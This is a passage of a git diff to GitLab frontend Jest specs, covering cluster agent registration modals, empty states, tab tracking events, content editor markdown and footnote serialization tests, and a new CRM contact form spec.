['configured-agent'], isRegistering: false, }; @@ -69,12 +35,6 @@ describe('AvailableAgentsDropdown', () => { expect(findDropdown().props('text')).toBe(i18n.selectAgent); }); - it('shows only agents that are not yet installed', () => { - expect(findDropdownItems()).toHaveLength(1); - expect(findConfiguredAgentItem().text()).toBe('configured-agent'); - expect(findConfiguredAgentItem().props('isChecked')).toBe(false); - }); - describe('click events', () => { beforeEach(() => { findConfiguredAgentItem().vm.$emit('click'); @@ -93,6 +53,7 @@ describe('AvailableAgentsDropdown', () => { describe('registration in progress', () => { const propsData = { + availableAgents: ['configured-agent'], isRegistering: true, }; @@ -108,22 +69,4 @@ describe('AvailableAgentsDropdown', () => { expect(findDropdown().props('loading')).toBe(true); }); }); - - describe('agents query is loading', () => { - const propsData = { - isRegistering: false, - }; - - beforeEach(() => { - createWrapper({ propsData, isLoading: true }); - }); - - it('updates the text in the dropdown', () => { - expect(findDropdown().text()).toBe(i18n.selectAgent); - }); - - it('displays a loading icon', () => { - expect(findDropdown().props('loading')).toBe(true); - }); - }); }); diff --git a/spec/frontend/clusters_list/components/clusters_empty_state_spec.js b/spec/frontend/clusters_list/components/clusters_empty_state_spec.js index f7e1791d0f7..cf0f6881960 100644 --- a/spec/frontend/clusters_list/components/clusters_empty_state_spec.js +++ b/spec/frontend/clusters_list/components/clusters_empty_state_spec.js @@ -6,35 +6,33 @@ import ClusterStore from '~/clusters_list/store'; const clustersEmptyStateImage = 'path/to/svg'; const newClusterPath = '/path/to/connect/cluster'; const emptyStateHelpText = 'empty state text'; -const canAddCluster = true; describe('ClustersEmptyStateComponent', () => { let wrapper; - const propsData = { - isChildComponent: false, - }; - - const provideData = { + const defaultProvideData = { 
clustersEmptyStateImage, - emptyStateHelpText: null, newClusterPath, }; - const entryData = { - canAddCluster, - }; - const findButton = () => wrapper.findComponent(GlButton); const findEmptyStateText = () => wrapper.findByTestId('clusters-empty-state-text'); - beforeEach(() => { + const createWrapper = ({ + provideData = { emptyStateHelpText: null }, + isChildComponent = false, + canAddCluster = true, + } = {}) => { wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, + store: ClusterStore({ canAddCluster }), + propsData: { isChildComponent }, + provide: { ...defaultProvideData, ...provideData }, stubs: { GlEmptyState }, }); + }; + + beforeEach(() => { + createWrapper(); }); afterEach(() => { @@ -55,16 +53,7 @@ describe('ClustersEmptyStateComponent', () => { describe('when the component is loaded as a child component', () => { beforeEach(() => { - propsData.isChildComponent = true; - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, - }); - }); - - afterEach(() => { - propsData.isChildComponent = false; + createWrapper({ isChildComponent: true }); }); it('should not render the action button', () => { @@ -74,12 +63,7 @@ describe('ClustersEmptyStateComponent', () => { describe('when the help text is provided', () => { beforeEach(() => { - provideData.emptyStateHelpText = emptyStateHelpText; - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, - }); + createWrapper({ provideData: { emptyStateHelpText } }); }); it('should show the empty state text', () => { @@ -88,14 +72,8 @@ describe('ClustersEmptyStateComponent', () => { }); describe('when the user cannot add clusters', () => { - entryData.canAddCluster = false; beforeEach(() => { - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: 
provideData, - stubs: { GlEmptyState }, - }); + createWrapper({ canAddCluster: false }); }); it('should disable the button', () => { expect(findButton().props('disabled')).toBe(true); diff --git a/spec/frontend/clusters_list/components/clusters_main_view_spec.js b/spec/frontend/clusters_list/components/clusters_main_view_spec.js index c2233e5d39c..37665bf7abd 100644 --- a/spec/frontend/clusters_list/components/clusters_main_view_spec.js +++ b/spec/frontend/clusters_list/components/clusters_main_view_spec.js @@ -1,5 +1,6 @@ import { GlTabs, GlTab } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import ClustersMainView from '~/clusters_list/components/clusters_main_view.vue'; import InstallAgentModal from '~/clusters_list/components/install_agent_modal.vue'; import { @@ -8,12 +9,15 @@ import { CLUSTERS_TABS, MAX_CLUSTERS_LIST, MAX_LIST_COUNT, + EVENT_LABEL_TABS, + EVENT_ACTIONS_CHANGE, } from '~/clusters_list/constants'; const defaultBranchName = 'default-branch'; describe('ClustersMainViewComponent', () => { let wrapper; + let trackingSpy; const propsData = { defaultBranchName, @@ -23,6 +27,7 @@ describe('ClustersMainViewComponent', () => { wrapper = shallowMountExtended(ClustersMainView, { propsData, }); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); afterEach(() => { @@ -54,10 +59,10 @@ describe('ClustersMainViewComponent', () => { describe('tabs', () => { it.each` - tabTitle | queryParamValue | lineNumber - ${'All'} | ${'all'} | ${0} - ${'Agent'} | ${AGENT} | ${1} - ${'Certificate based'} | ${CERTIFICATE_BASED} | ${2} + tabTitle | queryParamValue | lineNumber + ${'All'} | ${'all'} | ${0} + ${'Agent'} | ${AGENT} | ${1} + ${'Certificate'} | ${CERTIFICATE_BASED} | ${2} `( 'renders correct tab title and query param value', ({ tabTitle, queryParamValue, lineNumber }) => { @@ -71,6 +76,7 @@ describe('ClustersMainViewComponent', () => { 
beforeEach(() => { findComponent().vm.$emit('changeTab', AGENT); }); + it('changes the tab', () => { expect(findTabs().attributes('value')).toBe('1'); }); @@ -78,5 +84,13 @@ describe('ClustersMainViewComponent', () => { it('passes correct max-agents param to the modal', () => { expect(findModal().props('maxAgents')).toBe(MAX_LIST_COUNT); }); + + it('sends the correct tracking event', () => { + findTabs().vm.$emit('input', 1); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_CHANGE, { + label: EVENT_LABEL_TABS, + property: AGENT, + }); + }); }); }); diff --git a/spec/frontend/clusters_list/components/install_agent_modal_spec.js b/spec/frontend/clusters_list/components/install_agent_modal_spec.js index 6c2ea45b99b..4d1429c9e50 100644 --- a/spec/frontend/clusters_list/components/install_agent_modal_spec.js +++ b/spec/frontend/clusters_list/components/install_agent_modal_spec.js @@ -1,10 +1,21 @@ import { GlAlert, GlButton, GlFormInputGroup } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import AvailableAgentsDropdown from '~/clusters_list/components/available_agents_dropdown.vue'; import InstallAgentModal from '~/clusters_list/components/install_agent_modal.vue'; -import { I18N_INSTALL_AGENT_MODAL, MAX_LIST_COUNT } from '~/clusters_list/constants'; +import { + I18N_AGENT_MODAL, + MAX_LIST_COUNT, + EVENT_LABEL_MODAL, + EVENT_ACTIONS_OPEN, + EVENT_ACTIONS_SELECT, + MODAL_TYPE_EMPTY, + MODAL_TYPE_REGISTER, +} from '~/clusters_list/constants'; import getAgentsQuery from '~/clusters_list/graphql/queries/get_agents.query.graphql'; +import getAgentConfigurations from '~/clusters_list/graphql/queries/agent_configurations.query.graphql'; import createAgentMutation from 
'~/clusters_list/graphql/mutations/create_agent.mutation.graphql'; import createAgentTokenMutation from '~/clusters_list/graphql/mutations/create_agent_token.mutation.graphql'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -23,14 +34,28 @@ const localVue = createLocalVue(); localVue.use(VueApollo); const projectPath = 'path/to/project'; +const kasAddress = 'kas.example.com'; +const kasEnabled = true; +const emptyStateImage = 'path/to/image'; const defaultBranchName = 'default'; const maxAgents = MAX_LIST_COUNT; describe('InstallAgentModal', () => { let wrapper; let apolloProvider; + let trackingSpy; + + const configurations = [{ agentName: 'agent-name' }]; + const apolloQueryResponse = { + data: { + project: { + id: '1', + clusterAgents: { nodes: [] }, + agentConfigurations: { nodes: configurations }, + }, + }, + }; - const i18n = I18N_INSTALL_AGENT_MODAL; const findModal = () => wrapper.findComponent(ModalStub); const findAgentDropdown = () => findModal().findComponent(AvailableAgentsDropdown); const findAlert = () => findModal().findComponent(GlAlert); @@ -40,6 +65,8 @@ describe('InstallAgentModal', () => { .wrappers.find((button) => button.props('variant') === variant); const findActionButton = () => findButtonByVariant('confirm'); const findCancelButton = () => findButtonByVariant('default'); + const findSecondaryButton = () => wrapper.findByTestId('agent-secondary-button'); + const findImage = () => wrapper.findByRole('img', { alt: I18N_AGENT_MODAL.empty_state.altText }); const expectDisabledAttribute = (element, disabled) => { if (disabled) { @@ -52,7 +79,9 @@ describe('InstallAgentModal', () => { const createWrapper = () => { const provide = { projectPath, - kasAddress: 'kas.example.com', + kasAddress, + kasEnabled, + emptyStateImage, }; const propsData = { @@ -60,7 +89,7 @@ describe('InstallAgentModal', () => { maxAgents, }; - wrapper = shallowMount(InstallAgentModal, { + wrapper = shallowMountExtended(InstallAgentModal, { attachTo: 
document.body, stubs: { GlModal: ModalStub, @@ -85,10 +114,12 @@ describe('InstallAgentModal', () => { }); }; - const mockSelectedAgentResponse = () => { + const mockSelectedAgentResponse = async () => { createWrapper(); writeQuery(); + await wrapper.vm.$nextTick(); + wrapper.vm.setAgentName('agent-name'); findActionButton().vm.$emit('click'); @@ -96,120 +127,182 @@ describe('InstallAgentModal', () => { }; beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + ]); createWrapper(); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); afterEach(() => { wrapper.destroy(); - wrapper = null; apolloProvider = null; }); - describe('initial state', () => { - it('renders the dropdown for available agents', () => { - expect(findAgentDropdown().isVisible()).toBe(true); - expect(findModal().text()).not.toContain(i18n.basicInstallTitle); - expect(findModal().findComponent(GlFormInputGroup).exists()).toBe(false); - expect(findModal().findComponent(GlAlert).exists()).toBe(false); - expect(findModal().findComponent(CodeBlock).exists()).toBe(false); - }); + describe('when agent configurations are present', () => { + const i18n = I18N_AGENT_MODAL.agent_registration; - it('renders a cancel button', () => { - expect(findCancelButton().isVisible()).toBe(true); - expectDisabledAttribute(findCancelButton(), false); - }); + describe('initial state', () => { + it('renders the dropdown for available agents', () => { + expect(findAgentDropdown().isVisible()).toBe(true); + expect(findModal().text()).not.toContain(i18n.basicInstallTitle); + expect(findModal().findComponent(GlFormInputGroup).exists()).toBe(false); + expect(findModal().findComponent(GlAlert).exists()).toBe(false); + expect(findModal().findComponent(CodeBlock).exists()).toBe(false); + }); - it('renders a disabled next button', () => { - expect(findActionButton().isVisible()).toBe(true); - 
expect(findActionButton().text()).toBe(i18n.registerAgentButton); - expectDisabledAttribute(findActionButton(), true); - }); - }); + it('renders a cancel button', () => { + expect(findCancelButton().isVisible()).toBe(true); + expectDisabledAttribute(findCancelButton(), false); + }); - describe('an agent is selected', () => { - beforeEach(() => { - findAgentDropdown().vm.$emit('agentSelected'); - }); + it('renders a disabled next button', () => { + expect(findActionButton().isVisible()).toBe(true); + expect(findActionButton().text()).toBe(i18n.registerAgentButton); + expectDisabledAttribute(findActionButton(), true); + }); - it('enables the next button', () => { - expect(findActionButton().isVisible()).toBe(true); - expectDisabledAttribute(findActionButton(), false); + it('sends the event with the modalType', () => { + findModal().vm.$emit('show'); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_OPEN, { + label: EVENT_LABEL_MODAL, + property: MODAL_TYPE_REGISTER, + }); + }); }); - }); - describe('registering an agent', () => { - const createAgentHandler = jest.fn().mockResolvedValue(createAgentResponse); - const createAgentTokenHandler = jest.fn().mockResolvedValue(createAgentTokenResponse); + describe('an agent is selected', () => { + beforeEach(() => { + findAgentDropdown().vm.$emit('agentSelected'); + }); - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, createAgentHandler], - [createAgentTokenMutation, createAgentTokenHandler], - ]); + it('enables the next button', () => { + expect(findActionButton().isVisible()).toBe(true); + expectDisabledAttribute(findActionButton(), false); + }); - return mockSelectedAgentResponse(apolloProvider); + it('sends the correct tracking event', () => { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_SELECT, { + label: EVENT_LABEL_MODAL, + }); + }); }); - it('creates an agent and token', () => { - expect(createAgentHandler).toHaveBeenCalledWith({ - input: { 
name: 'agent-name', projectPath }, - }); + describe('registering an agent', () => { + const createAgentHandler = jest.fn().mockResolvedValue(createAgentResponse); + const createAgentTokenHandler = jest.fn().mockResolvedValue(createAgentTokenResponse); - expect(createAgentTokenHandler).toHaveBeenCalledWith({ - input: { clusterAgentId: 'agent-id', name: 'agent-name' }, + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, createAgentHandler], + [createAgentTokenMutation, createAgentTokenHandler], + ]); + + return mockSelectedAgentResponse(); }); - }); - it('renders a close button', () => { - expect(findActionButton().isVisible()).toBe(true); - expect(findActionButton().text()).toBe(i18n.close); - expectDisabledAttribute(findActionButton(), false); - }); + it('creates an agent and token', () => { + expect(createAgentHandler).toHaveBeenCalledWith({ + input: { name: 'agent-name', projectPath }, + }); - it('shows agent instructions', () => { - const modalText = findModal().text(); - expect(modalText).toContain(i18n.basicInstallTitle); - expect(modalText).toContain(i18n.basicInstallBody); + expect(createAgentTokenHandler).toHaveBeenCalledWith({ + input: { clusterAgentId: 'agent-id', name: 'agent-name' }, + }); + }); - const token = findModal().findComponent(GlFormInputGroup); - expect(token.props('value')).toBe('mock-agent-token'); + it('renders a close button', () => { + expect(findActionButton().isVisible()).toBe(true); + expect(findActionButton().text()).toBe(i18n.close); + expectDisabledAttribute(findActionButton(), false); + }); - const alert = findModal().findComponent(GlAlert); - expect(alert.props('title')).toBe(i18n.tokenSingleUseWarningTitle); + it('shows agent instructions', () => { + const modalText = findModal().text(); + expect(modalText).toContain(i18n.basicInstallTitle); + expect(modalText).toContain(i18n.basicInstallBody); - const code = 
findModal().findComponent(CodeBlock).props('code'); - expect(code).toContain('--agent-token=mock-agent-token'); - expect(code).toContain('--kas-address=kas.example.com'); - }); + const token = findModal().findComponent(GlFormInputGroup); + expect(token.props('value')).toBe('mock-agent-token'); - describe('error creating agent', () => { - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, jest.fn().mockResolvedValue(createAgentErrorResponse)], - ]); + const alert = findModal().findComponent(GlAlert); + expect(alert.props('title')).toBe(i18n.tokenSingleUseWarningTitle); - return mockSelectedAgentResponse(); + const code = findModal().findComponent(CodeBlock).props('code'); + expect(code).toContain('--agent-token=mock-agent-token'); + expect(code).toContain('--kas-address=kas.example.com'); + }); + + describe('error creating agent', () => { + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, jest.fn().mockResolvedValue(createAgentErrorResponse)], + ]); + + return mockSelectedAgentResponse(); + }); + + it('displays the error message', () => { + expect(findAlert().text()).toBe( + createAgentErrorResponse.data.createClusterAgent.errors[0], + ); + }); }); - it('displays the error message', () => { - expect(findAlert().text()).toBe(createAgentErrorResponse.data.createClusterAgent.errors[0]); + describe('error creating token', () => { + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryResponse)], + [createAgentMutation, jest.fn().mockResolvedValue(createAgentResponse)], + [createAgentTokenMutation, jest.fn().mockResolvedValue(createAgentTokenErrorResponse)], + ]); + + return mockSelectedAgentResponse(); + }); + + it('displays the error message', async () => { + expect(findAlert().text()).toBe( + createAgentTokenErrorResponse.data.clusterAgentTokenCreate.errors[0], 
+ ); + }); }); }); + }); - describe('error creating token', () => { - beforeEach(() => { - apolloProvider = createMockApollo([ - [createAgentMutation, jest.fn().mockResolvedValue(createAgentResponse)], - [createAgentTokenMutation, jest.fn().mockResolvedValue(createAgentTokenErrorResponse)], - ]); + describe('when there are no agent configurations present', () => { + const i18n = I18N_AGENT_MODAL.empty_state; + const apolloQueryEmptyResponse = { + data: { + project: { + clusterAgents: { nodes: [] }, + agentConfigurations: { nodes: [] }, + }, + }, + }; - return mockSelectedAgentResponse(); - }); + beforeEach(() => { + apolloProvider = createMockApollo([ + [getAgentConfigurations, jest.fn().mockResolvedValue(apolloQueryEmptyResponse)], + ]); + createWrapper(); + }); + + it('renders empty state image', () => { + expect(findImage().attributes('src')).toBe(emptyStateImage); + }); + + it('renders a secondary button', () => { + expect(findSecondaryButton().isVisible()).toBe(true); + expect(findSecondaryButton().text()).toBe(i18n.secondaryButton); + }); - it('displays the error message', () => { - expect(findAlert().text()).toBe( - createAgentTokenErrorResponse.data.clusterAgentTokenCreate.errors[0], - ); + it('sends the event with the modalType', () => { + findModal().vm.$emit('show'); + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTIONS_OPEN, { + label: EVENT_LABEL_MODAL, + property: MODAL_TYPE_EMPTY, }); }); }); diff --git a/spec/frontend/clusters_list/mocks/apollo.js b/spec/frontend/clusters_list/mocks/apollo.js index 1a7ef84a6d9..804f9834506 100644 --- a/spec/frontend/clusters_list/mocks/apollo.js +++ b/spec/frontend/clusters_list/mocks/apollo.js @@ -65,6 +65,7 @@ export const createAgentTokenErrorResponse = { export const getAgentResponse = { data: { project: { + id: 'project-1', clusterAgents: { nodes: [{ ...agent, tokens }], pageInfo, count }, repository: { tree: { diff --git 
a/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap b/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap index 118d8ceceb9..97d9be110c8 100644 --- a/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap +++ b/spec/frontend/code_navigation/components/__snapshots__/popover_spec.js.snap @@ -42,6 +42,8 @@ exports[`Code navigation popover component renders popover 1`] = ` <span> main() { </span> + + <br /> </span> <span class="line" @@ -50,6 +52,8 @@ exports[`Code navigation popover component renders popover 1`] = ` <span> } </span> + + <br /> </span> </pre> </div> diff --git a/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap b/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap index 178c7d749c8..7abd6b422ad 100644 --- a/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap +++ b/spec/frontend/content_editor/components/__snapshots__/toolbar_link_button_spec.js.snap @@ -19,7 +19,7 @@ exports[`content_editor/components/toolbar_link_button renders dropdown componen <div placeholder=\\"Link URL\\"> <div role=\\"group\\" class=\\"input-group\\"> <!----> - <!----> <input type=\\"text\\" placeholder=\\"Link URL\\" class=\\"gl-form-input form-control\\"> + <!----> <input type=\\"text\\" placeholder=\\"Link URL\\" class=\\"form-control gl-form-input\\"> <div class=\\"input-group-append\\"><button type=\\"button\\" class=\\"btn btn-confirm btn-md gl-button\\"> <!----> <!----> <span class=\\"gl-button-text\\">Apply</span></button></div> diff --git a/spec/frontend/content_editor/markdown_processing_examples.js b/spec/frontend/content_editor/markdown_processing_examples.js deleted file mode 100644 index da895970289..00000000000 --- a/spec/frontend/content_editor/markdown_processing_examples.js +++ /dev/null @@ -1,27 +0,0 @@ -import fs from 'fs'; -import path from 'path'; -import jsYaml from 'js-yaml'; -// 
eslint-disable-next-line import/no-deprecated -import { getJSONFixture } from 'helpers/fixtures'; - -export const loadMarkdownApiResult = (testName) => { - const fixturePathPrefix = `api/markdown/${testName}.json`; - - // eslint-disable-next-line import/no-deprecated - const fixture = getJSONFixture(fixturePathPrefix); - return fixture.body || fixture.html; -}; - -export const loadMarkdownApiExamples = () => { - const apiMarkdownYamlPath = path.join(__dirname, '..', 'fixtures', 'api_markdown.yml'); - const apiMarkdownYamlText = fs.readFileSync(apiMarkdownYamlPath); - const apiMarkdownExampleObjects = jsYaml.safeLoad(apiMarkdownYamlText); - - return apiMarkdownExampleObjects.map(({ name, context, markdown }) => [name, context, markdown]); -}; - -export const loadMarkdownApiExample = (testName) => { - return loadMarkdownApiExamples().find(([name, context]) => { - return (context ? `${context}_${name}` : name) === testName; - })[2]; -}; diff --git a/spec/frontend/content_editor/markdown_processing_spec.js b/spec/frontend/content_editor/markdown_processing_spec.js index 71565768558..3930f47289a 100644 --- a/spec/frontend/content_editor/markdown_processing_spec.js +++ b/spec/frontend/content_editor/markdown_processing_spec.js @@ -1,20 +1,16 @@ -import { createContentEditor } from '~/content_editor'; -import { loadMarkdownApiExamples, loadMarkdownApiResult } from './markdown_processing_examples'; +import path from 'path'; +import { describeMarkdownProcessing } from 'jest/content_editor/markdown_processing_spec_helper'; jest.mock('~/emoji'); -describe('markdown processing', () => { - // Ensure we generate same markdown that was provided to Markdown API. - it.each(loadMarkdownApiExamples())( - 'correctly handles %s (context: %s)', - async (name, context, markdown) => { - const testName = context ? 
`${context}_${name}` : name; - const contentEditor = createContentEditor({ - renderMarkdown: () => loadMarkdownApiResult(testName), - }); - await contentEditor.setSerializedContent(markdown); +const markdownYamlPath = path.join( + __dirname, + '..', + '..', + 'fixtures', + 'markdown', + 'markdown_golden_master_examples.yml', +); - expect(contentEditor.getSerializedContent()).toBe(markdown); - }, - ); -}); +// See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. +describeMarkdownProcessing('CE markdown processing in ContentEditor', markdownYamlPath); diff --git a/spec/frontend/content_editor/markdown_processing_spec_helper.js b/spec/frontend/content_editor/markdown_processing_spec_helper.js new file mode 100644 index 00000000000..bb7ec0030a2 --- /dev/null +++ b/spec/frontend/content_editor/markdown_processing_spec_helper.js @@ -0,0 +1,86 @@ +import fs from 'fs'; +import jsYaml from 'js-yaml'; +import { memoize } from 'lodash'; +import { createContentEditor } from '~/content_editor'; +import { setTestTimeoutOnce } from 'helpers/timeout'; + +const getFocusedMarkdownExamples = memoize( + () => process.env.FOCUSED_MARKDOWN_EXAMPLES?.split(',') || [], +); + +const includeExample = ({ name }) => { + const focusedMarkdownExamples = getFocusedMarkdownExamples(); + if (!focusedMarkdownExamples.length) { + return true; + } + return focusedMarkdownExamples.includes(name); +}; + +const getPendingReason = (pendingStringOrObject) => { + if (!pendingStringOrObject) { + return null; + } + if (typeof pendingStringOrObject === 'string') { + return pendingStringOrObject; + } + if (pendingStringOrObject.frontend) { + return pendingStringOrObject.frontend; + } + + return null; +}; + +const loadMarkdownApiExamples = (markdownYamlPath) => { + const apiMarkdownYamlText = fs.readFileSync(markdownYamlPath); + const apiMarkdownExampleObjects = jsYaml.safeLoad(apiMarkdownYamlText); + + return apiMarkdownExampleObjects + 
.filter(includeExample) + .map(({ name, pending, markdown, html }) => [ + name, + { pendingReason: getPendingReason(pending), markdown, html }, + ]); +}; + +const testSerializesHtmlToMarkdownForElement = async ({ markdown, html }) => { + const contentEditor = createContentEditor({ + // Overwrite renderMarkdown to always return this specific html + renderMarkdown: () => html, + }); + + await contentEditor.setSerializedContent(markdown); + + // This serializes the ContentEditor document, which was based on the HTML, to markdown + const serializedContent = contentEditor.getSerializedContent(); + + // Assert that the markdown we ended up with after sending it through all the ContentEditor + // plumbing matches the original markdown from the YAML. + expect(serializedContent).toBe(markdown); +}; + +// describeMarkdownProcesssing +// +// This is used to dynamically generate examples (for both CE and EE) to ensure +// we generate same markdown that was provided to Markdown API. +// +// eslint-disable-next-line jest/no-export +export const describeMarkdownProcessing = (description, markdownYamlPath) => { + const examples = loadMarkdownApiExamples(markdownYamlPath); + + describe(description, () => { + describe.each(examples)('%s', (name, { pendingReason, ...example }) => { + const exampleName = 'correctly serializes HTML to markdown'; + if (pendingReason) { + it.todo(`${exampleName}: ${pendingReason}`); + return; + } + + it(exampleName, async () => { + if (name === 'frontmatter_toml') { + setTestTimeoutOnce(2000); + } + await testSerializesHtmlToMarkdownForElement(example); + }); + }); + }); +}; diff --git a/spec/frontend/content_editor/services/markdown_serializer_spec.js b/spec/frontend/content_editor/services/markdown_serializer_spec.js index cfd93c2df10..97f6d8f6334 100644 --- a/spec/frontend/content_editor/services/markdown_serializer_spec.js +++ b/spec/frontend/content_editor/services/markdown_serializer_spec.js @@ -11,6 +11,9 @@ import Division from 
'~/content_editor/extensions/division'; import Emoji from '~/content_editor/extensions/emoji'; import Figure from '~/content_editor/extensions/figure'; import FigureCaption from '~/content_editor/extensions/figure_caption'; +import FootnoteDefinition from '~/content_editor/extensions/footnote_definition'; +import FootnoteReference from '~/content_editor/extensions/footnote_reference'; +import FootnotesSection from '~/content_editor/extensions/footnotes_section'; import HardBreak from '~/content_editor/extensions/hard_break'; import Heading from '~/content_editor/extensions/heading'; import HorizontalRule from '~/content_editor/extensions/horizontal_rule'; @@ -28,7 +31,6 @@ import TableHeader from '~/content_editor/extensions/table_header'; import TableRow from '~/content_editor/extensions/table_row'; import TaskItem from '~/content_editor/extensions/task_item'; import TaskList from '~/content_editor/extensions/task_list'; -import Text from '~/content_editor/extensions/text'; import markdownSerializer from '~/content_editor/services/markdown_serializer'; import { createTestEditor, createDocBuilder } from '../test_utils'; @@ -47,6 +49,9 @@ const tiptapEditor = createTestEditor({ DetailsContent, Division, Emoji, + FootnoteDefinition, + FootnoteReference, + FootnotesSection, Figure, FigureCaption, HardBreak, @@ -58,7 +63,6 @@ const tiptapEditor = createTestEditor({ Link, ListItem, OrderedList, - Paragraph, Strike, Table, TableCell, @@ -66,7 +70,6 @@ const tiptapEditor = createTestEditor({ TableRow, TaskItem, TaskList, - Text, ], }); @@ -84,6 +87,9 @@ const { descriptionItem, descriptionList, emoji, + footnoteDefinition, + footnoteReference, + footnotesSection, figure, figureCaption, heading, @@ -120,6 +126,9 @@ const { emoji: { markType: Emoji.name }, figure: { nodeType: Figure.name }, figureCaption: { nodeType: FigureCaption.name }, + footnoteDefinition: { nodeType: FootnoteDefinition.name }, + footnoteReference: { nodeType: FootnoteReference.name }, + 
footnotesSection: { nodeType: FootnotesSection.name }, hardBreak: { nodeType: HardBreak.name }, heading: { nodeType: Heading.name }, horizontalRule: { nodeType: HorizontalRule.name }, @@ -1108,4 +1117,22 @@ there `.trim(), ); }); + + it('correctly serializes footnotes', () => { + expect( + serialize( + paragraph( + 'Oranges are orange ', + footnoteReference({ footnoteId: '1', footnoteNumber: '1' }), + ), + footnotesSection(footnoteDefinition(paragraph('Oranges are fruits'))), + ), + ).toBe( + ` +Oranges are orange [^1] + +[^1]: Oranges are fruits + `.trim(), + ); + }); }); diff --git a/spec/frontend/crm/contact_form_spec.js b/spec/frontend/crm/contact_form_spec.js new file mode 100644 index 00000000000..b2753ad8cf5 --- /dev/null +++ b/spec/frontend/crm/contact_form_spec.js @@ -0,0 +1,157 @@ +import { GlAlert } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import ContactForm from '~/crm/components/contact_form.vue'; +import createContactMutation from '~/crm/components/queries/create_contact.mutation.graphql'; +import updateContactMutation from '~/crm/components/queries/update_contact.mutation.graphql'; +import getGroupContactsQuery from '~/crm/components/queries/get_group_contacts.query.graphql'; +import { + createContactMutationErrorResponse, + createContactMutationResponse, + getGroupContactsQueryResponse, + updateContactMutationErrorResponse, + updateContactMutationResponse, +} from './mock_data'; + +describe('Customer relations contact form component', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + let mutation; + let queryHandler; + + const findSaveContactButton = () => wrapper.findByTestId('save-contact-button'); + const findCancelButton = () => wrapper.findByTestId('cancel-button'); + const findForm = () => 
wrapper.find('form'); + const findError = () => wrapper.findComponent(GlAlert); + + const mountComponent = ({ mountFunction = shallowMountExtended, editForm = false } = {}) => { + fakeApollo = createMockApollo([[mutation, queryHandler]]); + fakeApollo.clients.defaultClient.cache.writeQuery({ + query: getGroupContactsQuery, + variables: { groupFullPath: 'flightjs' }, + data: getGroupContactsQueryResponse.data, + }); + const propsData = { drawerOpen: true }; + if (editForm) + propsData.contact = { firstName: 'First', lastName: 'Last', email: 'email@example.com' }; + wrapper = mountFunction(ContactForm, { + provide: { groupId: 26, groupFullPath: 'flightjs' }, + apolloProvider: fakeApollo, + propsData, + }); + }; + + beforeEach(() => { + mutation = createContactMutation; + queryHandler = jest.fn().mockResolvedValue(createContactMutationResponse); + }); + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + describe('Save contact button', () => { + it('should be disabled when required fields are empty', () => { + mountComponent(); + + expect(findSaveContactButton().props('disabled')).toBe(true); + }); + + it('should not be disabled when required fields have values', async () => { + mountComponent(); + + wrapper.find('#contact-first-name').vm.$emit('input', 'A'); + wrapper.find('#contact-last-name').vm.$emit('input', 'B'); + wrapper.find('#contact-email').vm.$emit('input', 'C'); + await waitForPromises(); + + expect(findSaveContactButton().props('disabled')).toBe(false); + }); + }); + + it("should emit 'close' when cancel button is clicked", () => { + mountComponent(); + + findCancelButton().vm.$emit('click'); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + + describe('when create mutation is successful', () => { + it("should emit 'close'", async () => { + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when create mutation fails', () => 
